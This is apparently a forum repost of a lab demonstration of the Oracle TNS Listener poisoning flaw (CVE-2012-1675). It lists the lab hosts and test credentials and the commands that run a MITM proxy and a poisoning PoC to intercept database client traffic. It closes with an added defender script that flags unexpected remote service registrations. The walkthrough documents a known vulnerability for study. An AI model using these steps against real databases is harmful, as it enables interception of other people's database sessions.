Nytro

CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration



Timeline:

Vulnerability discovered by Joxean Koret in 2008

Vulnerability reported to the vendor by Joxean Koret in 2008

Public release of the vulnerability in Oracle CPU by the vendor on 2012-04-17

Details and PoC of the vulnerability released by Joxean Koret on 2012-04-18

Fake patching of the vulnerability discovered by Joxean Koret on 2012-04-26

PoC provided by:

Joxean Koret

Reference(s):

Oracle CPU of April 2012

Joxean Koret details and PoC

CVE-2012-1675

Oracle Security Alert for CVE-2012-1675

Affected version(s):

All versions of Oracle Database

Tested with:

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

Description:

[Figure: oracle-tns-poison.png]

Using Joxean Koret's PoC requires that the database name be 6 characters long.

Database server characteristics :

IP : 192.168.178.150

Oracle version : 10.2.0.4.0

Database listener port : 1521

Database listener has no client IP restrictions

Database name : arcsig

Database username : arcsig

Database password : testtest

Database client characteristics :

IP : 192.168.178.151

SQL*Plus version : 10.2.0.4.0

“tnsnames.ora” file as below:

TARGET.DB=
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    (CONNECT_DATA =
      (SERVICE_NAME= arcsig)
    )
  )

Attacker characteristics :

IP : 192.168.178.100

Usage of PoC provided by Joxean Koret

Demonstration:

PoC validation phase

On database server :

ifconfig

ps faux

netstat -tan

On database client :

ifconfig

sqlplus -v

cat tnsnames.ora

sqlplus arcsig@TARGET.DB

HELP

QUIT

PoC exploitation phase

On attacker :

Start the MITM proxy, which will intercept the communication between the client and the database:

sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521

Start the vulnerability exploitation :

python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

On the database client :

Connect with SQL*Plus

sqlplus arcsig@TARGET.DB

?

? INDEX

TOTO

QUIT

You can see that the communications are intercepted by the proxy.

Source: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration
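A defender-side check for the state this demonstration leaves on the listener, as an added example that is not part of the original post or of Joxean Koret's PoC: it scans `lsnrctl services`-style output for a service handler registered from a remote host that is not on an allow-list. The sample output is constructed and simplified for this lab's addresses, and the function names are hypothetical.

```python
import re

# Constructed, simplified sample modelled on `lsnrctl services` output for the
# lab on this page (server 192.168.178.150, service "arcsig"). Not real output.
SAMPLE = """\
Service "arcsig" has 2 instance(s).
  Instance "arcsig", status READY, has 1 handler(s) for this service...
    Handler(s):
      "DEDICATED" established:12 refused:0 state:ready
         LOCAL SERVER
  Instance "arcsig", status READY, has 1 handler(s) for this service...
    Handler(s):
      "DEDICATED" established:3 refused:0 state:ready
         REMOTE SERVER
         (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.178.100)(PORT=1521))
"""

SERVICE_RE = re.compile(r'^Service "([^"]+)" has \d+ instance')
INSTANCE_RE = re.compile(r'^\s*Instance "([^"]+)"')
HOST_RE = re.compile(r"\(HOST\s*=\s*([^)\s]+)\s*\)", re.IGNORECASE)

def remote_handlers(text):
    """Return (service, instance, host) for each REMOTE SERVER handler.
    host is None when no address line follows, so callers can fail closed."""
    found, service, instance, pending = [], None, None, False
    for line in text.splitlines():
        if pending:  # the line after "REMOTE SERVER" should carry the address
            m = HOST_RE.search(line)
            found.append((service, instance, m.group(1).lower() if m else None))
            pending = False
            if m:
                continue
        if (m := SERVICE_RE.match(line)):
            service, instance = m.group(1), None
        elif (m := INSTANCE_RE.match(line)):
            instance = m.group(1)
        elif line.strip() == "REMOTE SERVER":
            pending = True
    if pending:  # output ended right after "REMOTE SERVER"
        found.append((service, instance, None))
    return found

def unexpected_registrations(text, allowed_hosts):
    """Remote handlers whose host is not allow-listed (hypothetical helper).
    Remote registration is legitimate in some setups (e.g. RAC), hence the list."""
    allowed = {h.lower() for h in allowed_hosts}
    return [r for r in remote_handlers(text) if r[2] not in allowed]

if __name__ == "__main__":
    for svc, inst, host in unexpected_registrations(SAMPLE, {"192.168.178.150"}):
        print(f"ALERT service={svc} instance={inst} remote_host={host}")
```

A handler with no parseable address is reported with host `None`, so it is flagged rather than silently skipped.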
